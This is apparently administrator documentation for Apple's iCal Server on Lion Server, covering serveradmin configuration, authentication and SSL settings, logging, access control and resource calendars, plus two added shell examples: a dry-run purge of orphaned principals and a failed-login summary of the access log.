- asr: Use to back up and restore a volume at disk block level. If asr degrades to file copy mode, rather than block copy mode, it does not copy the necessary extended attributes. Make sure asr is performing a block copy, not a file copy.
- cp and scp: Use these tools to copy files and preserve extended attributes for iCal Server.
- tar, pax, and gzip: Use these tools to archive and compress data for use with iCal Server.
Note: You can use the launchctl command to automate data backup using the commands above. For more information about using launchd, see its man page.

User collaboration services > Calendar service > Understanding Calendar

About administration configuration files

Administer iCal Server using the Server app or serveradmin. If the Server app and serveradmin are unavailable, you can configure and run iCal Server from the command line, using built-in tools. The following files are used to run iCal Server:
- /etc/caldavd/caldavd.plist: The main configuration file for caldavd. The file contains an XML property list of server options and provides information such as the port to bind to and whether to use SSL. You can specify the names of other files in it.
- /var/log/caldavd/access.log: The server's main log file
- /var/run/caldavd.pid: The server's process ID file
- /usr/share/caldavd: Implementation and support files

User collaboration services > Calendar service > Understanding Calendar

Understanding the data store and file hierarchy for iCal Server

Calendar event data is stored in a postgres database, with some support files in the file system. This is different from Snow Leopard Server, where all calendar data files were stored on the file system. Now only attachments and the proxy database are stored on the file system. All other calendar data is stored in a database. When backing up calendar server files, make sure to back up the /Library/Server/Calendar and Contacts/ directory and the postgres databases.
Database files
iCal Server uses database files for various purposes. It uses a postgres database to store calendar data. It uses sqlite files to store proxy relationships. To troubleshoot or resolve problems, an administrator needs to use postgres database queries. Teaching postgres database manipulation is beyond the scope of this topic. To access the database, you need to use the postgres and pg_ctl command-line tools.
File system files
By default, the root data store location is /Library/Server/Calendar and Contacts/, but you can specify another location using the serveradmin command-line tool. When setting this path in the command-line tool, it is an absolute path. The Calendar and Contacts folder contains two folders: Data and Documents. When setting the location of these two folders in the command-line tool, the paths are relative to the root data store location. The Data folder contains the sqlite databases for proxies, and an XML list of resources and locations in the calendar system. The Documents folder contains event attachments. To access the files, you need root access to the /Library/Server/Calendar and Contacts/ folder and its subfolders (or whatever path you configured using serveradmin).

User collaboration services > Calendar service > Understanding Calendar

Calendar proxies and delegates

Users can create and remove calendar events in their own calendars in iCal Server. When users want to have someone else edit their personal calendars, they delegate (or assign a proxy for) calendar management. iCal Server supports calendar viewing and editing delegates, allowing designated persons to read or write a user's calendars. Calendar delegation isn't configured on the server side. To set up a user or group delegate, you use calendar client software. You use the Server app to choose delegates for resource and location calendars. To learn how to configure calendar delegation, see the documentation for your calendar client.

User collaboration services > Calendar service > Configure Calendar

Setting the iCal Server host name

When setting up iCal Server, you specify the host name of the iCal server. Configure the service to use a fully qualified domain name that is matched with a reverse lookup record. If left blank, the calendar server defaults to the local hostname. Make this change in the DNS SRV records before completing this step.

Use serveradmin via the Terminal app to set the host name:
sudo serveradmin set calendar:ServerHostName = "<hostname>"
Use a fully qualified domain name for <hostname>.
Command example:
sudo serveradmin set calendar:ServerHostName = "cal.example.com"

User collaboration services > Calendar service > Configure Calendar

Setting the iCal Server port number

You can change the network port numbers that iCal Server uses. When setting up iCal Server, the server is set to use TCP port 8008 for unencrypted connections and 8442 for SSL connections.

Use serveradmin via the Terminal app to change the unencrypted connection setting:
sudo serveradmin set calendar:HTTPPort = "<PortNumber>"
The default value for <PortNumber> is 8008.
Command example:
sudo serveradmin set calendar:HTTPPort = "9009"

Use serveradmin via the Terminal app to change the SSL connection setting (the SSL port has its own key, SSLPort, not HTTPPort):
sudo serveradmin set calendar:SSLPort = "<SSLPortNumber>"
The default value for <SSLPortNumber> is 8443.
Command example:
sudo serveradmin set calendar:SSLPort = "8484"

User collaboration services > Calendar service > Configure Calendar

Set iCal push notification server

Apple's iCal Server supports push notification for calendar invitations and events. Instead of having the calendar client constantly poll the calendar server for new event invitations, the client maintains a very light network connection and the server informs the client if the client has received an event invitation, or if an event has changed. See About push notification for more information and links to related topics.


User collaboration services > Calendar service > Configure Calendar

Change the calendar data store location

The data store is where the server stores user calendars and event attachments. The default location is /Library/Server/Calendar and Contacts/. Change the default calendar data store location using serveradmin. If you change the data store location, you must set the proper permissions on the new data store location. The data store location is relative to the local file system, so if the storage location is on a network volume, enter the local file system mount point and not a network URL. If you have a data store fully populated with user calendars, you must move the files when you change the location. To see how to move the files, see Understanding the data store and file hierarchy for iCal Server.

1. Create the new directory, if needed:
sudo mkdir <new_path>
The value for <new_path> is the new location of the data store.
Command example:
sudo mkdir /Volumes/NetworkDrive/CalendarData/
2. Give the target directory the right owner and permissions:
sudo chown _calendar:_calendar <new_path>
sudo chmod 740 <new_path>
The value for <new_path> is the new location of the data store.
Command example:
sudo chown _calendar:_calendar /Volumes/NetworkDrive/CalendarData/
sudo chmod 740 /Volumes/NetworkDrive/CalendarData/
3. Use serveradmin via the Terminal app to set the location:
sudo serveradmin set calendar:ServerRoot = "<NewLocation>"
Command example:
sudo serveradmin set calendar:ServerRoot = "/Volumes/NetworkDrive/CalendarData/"

User collaboration services > Calendar service > Configure Calendar

Changing the maximum attachment size

The maximum attachment size is the maximum total size of all the data in an event, including text in the Notes field. Each event on a calendar has a file of a determinate size. There is no limit to the total number of external files attached to a single event except for the calendar user's storage quota, and external attached files do not count against the maximum attachment size.

Use serveradmin via the Terminal app to change the file size in bytes:
sudo serveradmin set calendar:MaximumAttachmentSize = "<file_size>"
The default value for <file_size> is 1048576.
Command example:
sudo serveradmin set calendar:MaximumAttachmentSize = "2097152"

User collaboration services > Calendar service > Configure Calendar

Changing calendar user quotas

The calendar server has several different quota types:
- the maximum size in bytes for all attachments
- the maximum number of calendars a user can create
- the maximum number of events and tasks that a user can create in each calendar
- the maximum size in bytes of each event or task
You can use the command line to change the users' quotas. Each calendar user has a disk quota. Quotas are not set on a per-user basis; they are set globally for all users. Do not allow the total of all your users' quotas to exceed the storage capacity of the data store.

Use serveradmin via the Terminal app to set the quota limits:
sudo serveradmin set calendar:UserQuota = "<FileSize>"
sudo serveradmin set calendar:MaxCollectionsPerHome = "<Number>"
sudo serveradmin set calendar:MaxResourcesPerCollection = "<Number>"
sudo serveradmin set calendar:MaxResourceSize = "<FileSize>"

Key                        Description                                                                      Default value
UserQuota                  the maximum size in bytes for all attachments                                    104857600
MaxCollectionsPerHome      the maximum number of calendars a user can create                                50
MaxResourcesPerCollection  the maximum number of events and tasks that a user can create in each calendar  10000
MaxResourceSize            the maximum size in bytes of each event or task                                  1048576

Command example:
sudo serveradmin set calendar:UserQuota = "209715200"
sudo serveradmin set calendar:MaxCollectionsPerHome = "100"
sudo serveradmin set calendar:MaxResourcesPerCollection = "12000"
sudo serveradmin set calendar:MaxResourceSize = "209715200"

User collaboration services > Calendar service > Configure Calendar

Edit calendar resources and locations using the command line

Users and groups aren't the only parts of a calendaring system. Resources like projectors, microscopes, or cameras, and locations like conference rooms or buildings, must be scheduled, but they can't keep their own calendar. These resources and locations are like users and groups: they accept event invitations, and they have scheduling constraints. Therefore, they exist as principal entities on the calendar server for other users and groups to include in event invitations. Using calendarserver_manage_principals, you can make a calendar for each resource and location in your organization. To use resources and locations with iCal Server, you need an Open Directory master to hold the resource and location records. If users aren't authenticating to an Open Directory system (for example, if they are authenticating to an Active Directory system), the resource and location records must be in an Open Directory master server, which is bound to the users' directory system. These settings can be changed with the calendarserver_manage_principals command-line tool. The Server app adds calendars for resources and locations to the iCal server, but you use the calendarserver_manage_principals command-line tool to choose delegates for resource and location calendars. For information on how to use calendarserver_manage_principals, see its man page.

Use calendarserver_manage_principals via the Terminal app to add a resource or location:
sudo calendarserver_manage_principals --add {locations|resources} 'full name' --set-auto-schedule={true|false}
Command example:
sudo calendarserver_manage_principals --add locations 'Conference Room' --set-auto-schedule=true
Use calendarserver_manage_principals via the Terminal app to remove a resource or location:
sudo calendarserver_manage_principals --remove {locations|resources} 'full name'
Command example:
sudo calendarserver_manage_principals --remove locations 'Conference Room'

User collaboration services > Calendar service > Configure Calendar

Enable email invitations (CLI)

Attendees can be invited via email if they don't have an iCal Server account. When using the mail service on the same server as iCal service, iCal Server is already configured to send email notifications. All you have to do is turn on mail notifications and mail service. When an event attendee is added by email address and the host name of the email address isn't the same host name as the calendar server, iCal Server can send a message to the attendee with the event information. iCal Server must have its own mail account in the mail system. iCal Server must be able to send mail to an outgoing mail server (an SMTP server) for relay, so you need the SMTP server host name and listening port. You must also make sure there are no firewalls blocking access to the mail server from the calendar server. The SMTP server must be configured to relay mail from the calendar server as well. iCal Server also requires access to an incoming mail server, POP or IMAP, for invitation notifications. These instructions assume the mail servers are configured and functioning. Email notifications can only be exchanged with external users. Users with an account on your iCal Server will receive a standard invitation in their calendar client software.

1. Set the following parameter using the Terminal:
sudo serveradmin set calendar:Scheduling:iMIP:Enabled = "yes"
2. If you aren't using the same server for mail service, set the following parameters:
sudo serveradmin set calendar:Scheduling:iMIP:Receiving:Server = "<mail server host name>"
sudo serveradmin set calendar:Scheduling:iMIP:Receiving:UseSSL = <yes or no>
sudo serveradmin set calendar:Scheduling:iMIP:Receiving:Username = "<iCal Server's user name>"
sudo serveradmin set calendar:Scheduling:iMIP:Receiving:Type = "<POP or IMAP>"
sudo serveradmin set calendar:Scheduling:iMIP:Receiving:Password = "<plaintext password>"
sudo serveradmin set calendar:Scheduling:iMIP:Receiving:Port = <POP or IMAP port number>
sudo serveradmin set calendar:Scheduling:iMIP:MailGatewayServer = "localhost"
sudo serveradmin set calendar:Scheduling:iMIP:MailGatewayPort = 62310
sudo serveradmin set calendar:Scheduling:iMIP:Sending:Server = "<SMTP hostname>"
sudo serveradmin set calendar:Scheduling:iMIP:Sending:Port = <SMTP port number>
sudo serveradmin set calendar:Scheduling:iMIP:Sending:Address = "<iCal Server's user name>"
The Sending: dictionary also accepts UseSSL, Username and Password keys that mirror the Receiving: ones, for the SMTP server's SSL, user name and password settings:
sudo serveradmin set calendar:Scheduling:iMIP:Sending:UseSSL = <yes or no>
sudo serveradmin set calendar:Scheduling:iMIP:Sending:Username = "<iCal Server's user name>"
sudo serveradmin set calendar:Scheduling:iMIP:Sending:Password = "<plaintext password>"

User collaboration services > Calendar service > Configure Calendar

Adding an iCal Server account to an iCal client

If your calendar is hosted on a CalDAV server (for example, through your workplace), you must set up your account in iCal so it can share information with the CalDAV server.

1. Choose iCal > Preferences and then click Accounts.
2. In the bottom-left corner of the preferences pane, click the Add button (+) to add an account.
3. From the Account type pop-up menu, select Automatic.
4. Enter the user short name and calendar server address. For example, John Doe (with a user short name of johndoe) enters johndoe@cal.example.com. The calendar server address is the fully qualified domain name of the calendar server (for example, cal.example.com). You can use only the domain name (for example, example.com) if the domain has an SRV DNS record for calendar service.
5. Click Create. You return to the Account Information pane of the account.
6. In the Refresh Calendars pop-up menu, specify how often you want your computer to update the information it shares with the server (for example, to look for meeting invitations or update changes you've made to your calendar).
7. Set the general times you want to be available for meetings and events. For example, if you work part time and want coworkers to schedule meetings with you only on weekdays between noon and 5:00 p.m., select Weekdays and enter the times in the adjacent fields. If your availability includes weekends or only some weekdays, select Custom, click Edit, and then make selections to set your availability.

User collaboration services > Calendar service > Configure Calendar

Make iCal Server host a Wiki Server's calendar

An iCal Server can host personal calendars for another Lion Server computer that is offering wiki service. When a Lion Server computer is running Wiki Server, the My Page starting point for wiki users can link to a built-in web calendar. The web calendar is a client for iCal Server and reads and writes to a user's CalDAV account calendar. However, the computer providing the wiki service doesn't need to also provide calendar service. You can designate a different server to act as the calendar server. You might want to do this because:
- You choose to spread services across several servers.
- You have a calendar server and are adding wiki service.
- You have a large, distributed calendar server infrastructure, and moving service onto the web server is impractical.
When you set up iCal Server to provide the calendar service for a wiki, Wiki Server provides access to the calendars, so users who do not have wiki privileges do not have calendar service.

Use serveradmin via the Terminal app to change the setting:
sudo serveradmin set calendar:Authentication:Wiki:Enabled = "<setting>"
The default value for <setting> is no. The other possible value is yes.
Command example:
sudo serveradmin set calendar:Authentication:Wiki:Enabled = "yes"
Use serveradmin via the Terminal app to designate the Wiki server:
sudo serveradmin set calendar:Authentication:Wiki:Hostname = "<DNSWikiServer>"
The value for <DNSWikiServer> is the Wiki server's fully qualified domain name.
Command example:
sudo serveradmin set calendar:Authentication:Wiki:Hostname = "wikiweb.example.com"
Use serveradmin via the Terminal app to encrypt the connection to the Wiki server:
sudo serveradmin set calendar:Authentication:Wiki:UseSSL = "(yes|no)"
The default value is no.
Command example:
sudo serveradmin set calendar:Authentication:Wiki:UseSSL = "yes"

User collaboration services > Calendar service > Configure Calendar

Create a calendar on an iCal Server using the iCal client

You can create separate calendars for different areas of your life (work, home, school, and so on). The iCal client makes it easy to make new calendars. If you are using some other calendar client (like Sunbird or Outlook), consult that application's help to create a calendar.

1. Select File > New Calendar > Your CalDAV calendar. If you do not select a calendar under the CalDAV account, the calendar is created locally, not on the iCal server.
2. Enter a name for your calendar and press the Return key.

User collaboration services > Calendar service > Calendar Security

About iCal Server security methods

Security for iCal Server consists of securing the authentication and the data transport.
Secure the authentication: This means using a method of authenticating users that is secure and doesn't transmit login credentials in clear text over the network. The high-security authentication used pervasively in Lion Server is Kerberos v5. To learn how to configure secure authentication, see Secure Authentication in iCal Server.
Secure the data transport: This means encrypting the network traffic between the calendar client and the calendar server. When the transport is encrypted, no one can analyze the network traffic and reconstruct the contents of the calendar. iCal Server uses SSL to encrypt the data transport. To learn how to configure and enable SSL for iCal Server, see Secure iCal Server network traffic and Secure iCal Server network traffic (CLI).

User collaboration serv ices

Calendar serv ice

Calendar Security

Secure Authentication in iCal Server


Users authenticate to iCal Server through any combination of the following methods: Kerberos, Digest, or Basic. You set the permitted authentication methods using serveradmin. For the highest security, choose Kerberos. Digest authentication requires no additional configuration.

Important: Neither the iCal app on Lion nor the Calendar app on iOS supports Kerberos authentication.

To use Kerberos authentication, you must have an existing Kerberos password authentication and encryption system in place for users. If you use Kerberos, make the relevant changes to your firewall to allow network access to the Kerberos server from the calendar server.

Authentication types:

Kerberos v5
    Uses strong encryption and is used in Mac OS X Lion for single sign-on to services offered by Lion Server. It is the recommended authentication method supported by Lion Server. Selecting this method requires the exclusive use of Kerberos authentication.

Digest
    HTTP Digest access authentication (RFC 2617). The client proves knowledge of the password by sending an MD5 hash of the password combined with a server-supplied nonce, so the password itself never crosses the network and no trusted third party (such as a Kerberos realm) is needed. A captured exchange can still be attacked offline by password guessing, so combine Digest with SSL. Selecting this method requires the exclusive use of Digest authentication.

Basic
    Plain-text authentication: the user name and password are sent base64-encoded, which is trivially reversible. Enable Basic only when every client connection is forced over SSL.

Use serveradmin via the Terminal app to enable or disable Digest MD5 authentication. The default is yes.

sudo serveradmin set calendar:Authentication:Digest:Enabled = "(yes|no)"

Command example:

sudo serveradmin set calendar:Authentication:Digest:Enabled = "yes"

Use serveradmin to enable or disable Kerberos. The default is no.

sudo serveradmin set calendar:Authentication:Kerberos:Enabled = "(yes|no)"

Command example:

sudo serveradmin set calendar:Authentication:Kerberos:Enabled = "yes"

Use serveradmin to set the Kerberos service principal host name. The default is blank, meaning the local host.

sudo serveradmin set calendar:Authentication:Kerberos:ServicePrincipal = "<Hostname>"

Command example:

sudo serveradmin set calendar:Authentication:Kerberos:ServicePrincipal = "REALM.EXAMPLE.COM"

Use serveradmin to enable or disable Basic authentication. The default is no, and it should stay disabled unless requests on the unencrypted port are redirected to SSL (see Secure iCal Server network traffic (CLI)).

sudo serveradmin set calendar:Authentication:Basic:Enabled = "(yes|no)"

Command example:

sudo serveradmin set calendar:Authentication:Basic:Enabled = "no"


Secure iCal Server network traffic (CLI)


When you enable Secure Sockets Layer (SSL), you encrypt all data sent between the iCal server and the client. To enable SSL, you must select a certificate. If you use the default self-signed certificate, the clients must choose to trust the certificate before they can make a secure connection.

You can choose to use or redirect SSL access. Choosing to use SSL access allows the iCal Server to accept connections on both the unencrypted port and the SSL port. Redirecting SSL access makes iCal Server listen for and accept connections over the designated SSL port, and redirects requests that arrive on the HTTP port to the HTTPS port. Only the redirect setting ensures that every client session is encrypted; with both ports open, a client configured for the plain port sends its calendar data, and with Basic authentication its password, in clear.

Use serveradmin via the Terminal app to change the SSL port number. The default is 8443.

sudo serveradmin set calendar:SSLPort = "<PortNumber>"

Command example:

sudo serveradmin set calendar:SSLPort = "8882"

Use serveradmin to set the location of the PEM SSL certificate. The default is /etc/certificates/.

sudo serveradmin set calendar:SSLCertificate = "<CertLocation>"

Command example:

sudo serveradmin set calendar:SSLCertificate = "/etc/certificates/"

Use serveradmin to set the location of the PEM private key. The default is /etc/certificates/. Keep the private key file readable only by root and the service account; anyone who can read it can impersonate the server.

sudo serveradmin set calendar:SSLPrivateKey = "<PrivateKeyLoc>"

Command example:

sudo serveradmin set calendar:SSLPrivateKey = "/etc/certificates/"

Use serveradmin to set the location of the PEM certificate authority chain file. The default is /etc/certificates/.

sudo serveradmin set calendar:SSLAuthorityChain = "<ChainFile>"

Command example:

sudo serveradmin set calendar:SSLAuthorityChain = "/etc/certificates/"

Use serveradmin to redirect insecure requests to the SSL port. The default is no.

sudo serveradmin set calendar:RedirectHTTPToHTTPS = "<setting>"

Command example:

sudo serveradmin set calendar:RedirectHTTPToHTTPS = "yes"


Secure iCal Server network traffic


When you enable Secure Sockets Layer (SSL), you encrypt all data sent between the iCal server and the client. To enable SSL, you must select a certificate. If you use the default self-signed certificate, the clients must choose to trust the certificate before they can make a secure connection.

You can choose to use or redirect SSL access. Choosing to use SSL access allows the iCal Server to accept connections on both the unencrypted port and the SSL port. Redirecting SSL access makes iCal Server listen for and accept connections over the designated SSL port, and redirects requests that arrive on the HTTP port to the HTTPS port.

The server can use an SSL certificate to identify itself electronically and communicate securely with users' computers and other servers on the local network and the Internet. The SSL certificate provides additional security for Address Book, iCal, iChat, mail, and web services. These services can use the certificate to encrypt and decrypt data they send to and receive from applications on users' computers.

You can use the self-signed certificate created for your server when you set it up, or a self-signed certificate you created, but users' applications won't trust these and will display messages asking if the user trusts your certificate. Using a certificate signed by a certificate authority the clients already trust relieves users from the uncertainty and tedium of manually accepting your certificate in these messages. It also closes a man-in-the-middle opening: users who are accustomed to accepting an untrusted self-signed certificate will accept an attacker's certificate just as readily, whereas an attacker's certificate for your host name fails validation against a trusted CA and the client refuses the connection.

1. Select the server under Hardware in the Server app sidebar.
2. Click Settings and then click the Edit button at the right of SSL Certificate.
3. From the Action pop-up menu, choose an available certificate.
   If the pop-up menu doesn't contain certificates, create a self-signed certificate. For instructions, see Create a self-signed certificate. To use a previously generated SSL certificate, import it.


Delete unused events and calendars


For security, privacy, or disk usage reasons, you might need to delete unused calendars. After calendar files and folders are created in the data store, they are not removed when a user, group, or resource is removed from the directory. This could cause unintended service behavior if a user, group, or resource is created at a future time with the same name as the defunct one, because the new principal could end up attached to the old calendar data. Important: Delete data with extreme caution. The deletion tool has a trial run function that lets you see what would be deleted with a given command without deleting any information. For more information on calendarserver_purge_principals and calendarserver_manage_principals, see their respective man pages.

1. Use calendarserver_manage_principals via the Terminal app to list the users, groups, locations, or resources.

sudo calendarserver_manage_principals --list-principals (users|groups|locations|resources)

Use users, groups, locations, or resources as desired. Command example:

sudo calendarserver_manage_principals --list-principals locations

This lists all locations or resources, including the name of the location/resource, the record name, and the UUID of the record:

Full name        Record name                             UUID
---------        -----------                             ----
SampleLocation   7697ca41-4d75-40a2-9c57-c507ceea5f9f    7697ca41-4d75-40a2-9c57-c507ceea5f9f

2. Use calendarserver_purge_principals via the Terminal app to delete the events associated with the UUID.

sudo calendarserver_purge_principals UUID

UUID is the UUID of the desired record. Command example:

sudo calendarserver_purge_principals 7697ca41-4d75-40a2-9c57-c507ceea5f9f
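A dry-run check for orphaned principals, as an added example that is not part of the Lion Server documentation or of the CalendarServer tools. It parses the listing printed by calendarserver_manage_principals --list-principals (a constructed sample in the same column layout is embedded; the exact header and spacing on a live server may differ) and compares the record names against a list of records that still exist in the directory (also constructed; on a live server you would produce it from the directory, for example with dscl, assuming the records live in the Resources and Places record types). It prints only the purge commands it would run, so nothing is deleted.

```shell
#!/bin/sh
# Added example (not from the Lion Server documentation): find calendar
# principals whose directory record no longer exists, and print the
# calendarserver_purge_principals commands that would remove their data.

# Constructed sample of calendarserver_manage_principals --list-principals
# output: full name, record name, UUID (the third column may equal the second).
PRINCIPAL_LISTING='Full name        Record name   UUID
---------        -----------   ----
Test Room 1      testroom1     7697ca41-4d75-40a2-9c57-c507ceea5f9f
Projector A      projectora    0b1f9a84-3e7d-4c0a-9b0e-5b2a7d6c1e33
Lab Microscope   microscope    c4d2e7f0-9a1b-4c3d-8e5f-6a7b8c9d0e1f'

# Constructed list of record names still present in the directory, one per
# line. On a real server this would come from the directory, for example
# (assumed record types):  dscl /LDAPv3/127.0.0.1 -list /Resources
LIVE_RECORDS='testroom1
microscope'

# orphan_principals LISTING LIVE_RECORDS
# Prints "record_name uuid" for every principal whose record name is not in
# LIVE_RECORDS. Header and dashes lines are skipped; a data line is
# recognised by its last field being a 36-character UUID.
orphan_principals() {
    printf '%s\n' "$1" | awk -v live="$2" '
        BEGIN { n = split(live, names, "\n"); for (i = 1; i <= n; i++) alive[names[i]] = 1 }
        length($NF) == 36 && $NF ~ /^[0-9a-fA-F-]+$/ {
            record = $(NF - 1)
            if (!(record in alive)) print record, $NF
        }'
}

# purge_commands LISTING LIVE_RECORDS
# Emits the purge command for each orphan without running it (dry run).
# Review the output before executing any line of it.
purge_commands() {
    orphan_principals "$1" "$2" | while read -r record uuid; do
        printf 'sudo calendarserver_purge_principals %s   # %s\n' "$uuid" "$record"
    done
}

purge_commands "$PRINCIPAL_LISTING" "$LIVE_RECORDS"
```

Because record names of resources and locations can be reused, compare on the UUID when you decide what to purge, and run the purge tool's own trial-run option (see its man page) before the real deletion.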

Monitor Calendar

Set logging levels


iCal Server keeps two logs: one for access and one for errors. You can view and filter the logs to troubleshoot the service or monitor overall service reliability. You can configure logs to give more tailored information. The settings range from very verbose (reporting everything that's happening in the server) to very quiet (reporting only the most serious errors).

Log levels:

Error
    Logs only critical errors. This produces the least amount of output, but it is focused on problems.
Warning
    Logs all errors, including innocuous errors like timeouts, as well as critical errors.
Info
    Logs normal operating actions as well as errors. This is a fairly detailed log.
Debug
    Logs everything in fine detail. Use this setting only for debugging purposes, and then set it back to another level after the log capture is complete; debug output is voluminous and may include request details you do not want retained.

Use serveradmin via the Terminal app to set the log level. The default log level key is info.

sudo serveradmin set calendar:DefaultLogLevel = "log_level_key"

Command example:

sudo serveradmin set calendar:DefaultLogLevel = "debug"


View iCal server logs


iCal Server keeps two logs: one for access and one for errors. You can view and filter the logs to troubleshoot the service or monitor service reliability.

Use tail via the Terminal app to follow the access log:

tail -F /var/log/caldavd/access.log

Use tail via the Terminal app to follow the error log:

tail -F /var/log/caldavd/error.log
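Watching the access log with tail is fine for troubleshooting, but for monitoring you usually want a summary, for example of clients that keep failing authentication. The following script is an added example and is not part of the Lion Server documentation. It reads access log lines on standard input in the Apache combined-style layout that caldavd writes (the trailing caldavd fields are ignored); the embedded lines are constructed for the example. A single 401 followed by a 2xx from the same client is the normal Digest or Basic challenge, so the script only flags clients with many 401s and no successful response at all.

```shell
#!/bin/sh
# Added example (not from the Lion Server documentation): summarize HTTP 401
# responses per client in the iCal Server access log to spot password guessing.

# Constructed sample lines in the Apache combined-style layout that caldavd
# writes to /var/log/caldavd/access.log (trailing caldavd fields such as
# "i=" and "t=" are ignored). Field 1 is the client, field 9 the status code.
SAMPLE_LOG='10.0.1.66 - - [24/Oct/2011:09:12:01 -0700] "PROPFIND /principals/ HTTP/1.1" 401 140 "-" "CalendarStore/5.0" i=0 t=3.1
10.0.1.66 - - [24/Oct/2011:09:12:02 -0700] "PROPFIND /principals/ HTTP/1.1" 401 140 "-" "CalendarStore/5.0" i=0 t=2.9
10.0.1.66 - - [24/Oct/2011:09:12:03 -0700] "PROPFIND /principals/ HTTP/1.1" 401 140 "-" "CalendarStore/5.0" i=0 t=3.0
10.0.1.66 - - [24/Oct/2011:09:12:04 -0700] "PROPFIND /principals/ HTTP/1.1" 401 140 "-" "CalendarStore/5.0" i=0 t=3.2
10.0.1.7 - - [24/Oct/2011:09:13:09 -0700] "PROPFIND /calendars/ HTTP/1.1" 401 140 "-" "CalendarStore/5.0" i=0 t=2.5
10.0.1.7 - jappleseed [24/Oct/2011:09:13:10 -0700] "PROPFIND /calendars/__uids__/7697ca41/ HTTP/1.1" 207 1812 "-" "CalendarStore/5.0" i=0 t=11.0'

# failed_auth_report < access.log
# Prints "client failures successes" per client, sorted by client. A single
# 401 followed by a 2xx is the normal Digest/Basic challenge; a client with
# many 401s and no 2xx never authenticated successfully.
failed_auth_report() {
    awk '{
        client = $1; status = $9
        seen[client] = 1
        if (status == 401) fail[client]++
        else if (status >= 200 && status < 300) ok[client]++
    }
    END { for (c in seen) printf "%s %d %d\n", c, fail[c] + 0, ok[c] + 0 }' | sort
}

# suspicious_clients THRESHOLD < access.log
# Prints clients with at least THRESHOLD failures and no successful response.
suspicious_clients() {
    failed_auth_report | awk -v t="$1" '$2 >= t && $3 == 0 { print $1 }'
}

printf '%s\n' "$SAMPLE_LOG" | failed_auth_report
printf '%s\n' "$SAMPLE_LOG" | suspicious_clients 3
```

Against the live log, feed the file on standard input, for example suspicious_clients 10 < /var/log/caldavd/access.log (reading the log may require sudo). Remember that many legitimate clients behind one NAT gateway share an address, so treat the output as a lead to investigate, not as proof of an attack.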


Rotating access logs


Service logs sometimes require archiving. Rotating the logs regularly keeps individual files small, which makes searching faster and limits disk use. Enabling this setting allows the access log to be archived and refreshed.

sudo serveradmin set calendar:RotateAccessLog = yes

Manage Calendar

Create the iCal Server's Service Access Control List (CLI)


You determine whether a user can authenticate to iCal Server by adding him or her to a group called com.apple.access_calendar. You can use the Server Admin service access feature to add users and groups to this group. If you manage users using Workgroup Manager and want to add calendar permissions to a user, you must add the user to the iCal SACL yourself. If you manage users with the Server app and add calendar permissions to a user, the user gets the correct service access control list (SACL) setting for calendar use automatically.

1. Add a user to the group. You must provide the directory administrator password when prompted (the -p option prompts for it rather than taking it on the command line, so it does not end up in the shell history).

dseditgroup -o edit -n /LDAPv3/LDAP_server_hostname -u directory_admin_username -p -a username -t user com.apple.access_calendar

Command example:

dseditgroup -o edit -n /LDAPv3/directory.example.com -u diradmin -p -a john_appleseed -t user com.apple.access_calendar

2. Add a group to the group. You must provide the directory administrator password.

dseditgroup -o edit -n /LDAPv3/LDAP_server_hostname -u directory_admin_username -p -a group_name -t group com.apple.access_calendar

Command example:

dseditgroup -o edit -n /LDAPv3/directory.example.com -u diradmin -p -a staff -t group com.apple.access_calendar

To confirm a membership afterwards, use the checkmember operation described in the dseditgroup man page.


Create the iCal Servers Service Access Control List


You determine whether a user can authenticate to iCal Server by adding him or her to a group called com.apple.access_calendar. You can use the Server Admin service access feature to add users and groups to this group.

If you manage users using Workgroup Manager and want to add calendar permissions to a user, you must add the user to the iCal SACL yourself. If you manage users with the Server app and add calendar permissions to a user, the user gets the correct service access control list (SACL) setting for calendar use automatically.

1. Open Server Admin and select the server from the Servers list.
2. Click Access.
3. From the Service list, make sure For all services or iCal Server is selected.
   For all services makes changes to all services. Selecting iCal Server only changes the SACL for iCal Server.
4. To provide unrestricted access to iCal Server, click Allow all users and groups.
5. To restrict access to specific users and groups:
   a. Select Allow only users and groups below.
   b. Click the Add button (+) to open the Users & Groups drawer.
   c. Drag users and groups from the Users & Groups drawer to the list.
6. To provide push notification, repeat these steps for iChat server as well.

Resources and locations

About calendar resources and locations


Users and groups aren't the only parts of a calendaring system. Resources like projectors, microscopes, or cameras, and locations like conference rooms or buildings, must be scheduled, but they can't keep their own calendar. These resources and locations are like users and groups: they accept event invitations, and they have scheduling constraints. Therefore, they exist as principal entities on the calendar server for other users and groups to include in event invitations. You can make a calendar for each resource and location in your organization.

RELATED TOPICS

Create iCal resources and locations
Delete iCal resources and locations


Delete iCal resources and locations


You can remove iCal service resource and location calendars.

1. Before deleting the location or resource, delete the events associated with it.
   a. Use calendarserver_manage_principals via the Terminal app to list the locations or resources.

   sudo calendarserver_manage_principals --list-principals (locations|resources)

   Use locations or resources as desired. Command example:

   sudo calendarserver_manage_principals --list-principals locations

   This lists all locations or resources, including the name of the location/resource, the record name, and the UUID of the record:

   Full name     Record name                             UUID
   ---------     -----------                             ----
   Test Room 1   7697ca41-4d75-40a2-9c57-c507ceea5f9f    7697ca41-4d75-40a2-9c57-c507ceea5f9f

   b. In the list, find the resource or location you want to remove.
   c. Use calendarserver_purge_principals via the Terminal app to delete the data for the location or resource using the UUID of the record.

   sudo calendarserver_purge_principals UUID

   UUID is the UUID of the desired record. Command example:

   sudo calendarserver_purge_principals 7697ca41-4d75-40a2-9c57-c507ceea5f9f

2. In the iCal Server pane of Server app, select a location or resource.
3. Click Remove (-).

RELATED TOPICS

About calendar resources and locations
Create iCal resources and locations


Create iCal resources and locations


Users and groups aren't the only parts of a calendaring system. Resources like projectors, microscopes, or cameras, and locations like conference rooms or buildings, must be scheduled, but they can't keep their own calendar. These resources and locations are like users and groups: they accept event invitations, and they have scheduling constraints. Therefore, they exist as principal entities on the calendar server for other users and groups to include in event invitations. Using the Server app, you can make a calendar for each resource and location in your organization. To have a delegate (or proxy) manage a location or resource calendar, the iCal service user must already exist before you assign delegate roles. Created locations and resources are reservable and can be set to accept event invitations automatically or through a delegate.

1. Click Add (+) to add a location or resource.
2. Enter the calendar type: Location or Resource.
3. Enter a name for the location or resource.
4. Choose how the location or resource will accept event invitations and mark the event as Busy.
   Automatically: accepts all invitations as they are received.
   With Delegate Approval: holds event invitations until the designated delegate approves the invitation. You must provide a delegate.
5. Choose a delegate for the location or resource. Delegates are required if the location or resource is set to accept invitations with delegate approval. Delegates can also view and edit the resource calendar even if they don't approve invitations, so assign a delegate that is trusted with the full contents of that calendar. The delegate must be an existing iCal Server user or group. Only one delegated user or group can be assigned.

RELATED TOPICS

About calendar resources and locations
Delete iCal resources and locations


Setting a delegate using iCal client

